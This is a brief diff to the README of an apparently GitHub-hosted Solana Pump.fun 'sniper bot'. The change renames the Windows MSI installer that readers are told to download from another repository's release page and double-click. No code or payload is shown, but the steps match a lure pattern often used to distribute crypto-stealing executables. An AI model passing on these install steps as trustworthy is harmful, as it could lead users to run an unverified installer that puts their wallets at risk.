mohnate/Solana-Pump.fun-sniper-bot/README.md

 ### 🖥️ Installation for Windows
 1. Download the latest release from the [Releases Page](https://github.com/Raydium-Bot/Raydium-Sol-Sniper-Bot/releases/tag/v2.0).
 2. Extract the ZIP file to your desired location.
-3. Launch the application by double-clicking on `RaydiumSniperBot.msi`.
+3. Launch the application by double-clicking on `solanapumpfunbot.msi`.

 ## 📥 Alternative Installation (Windows)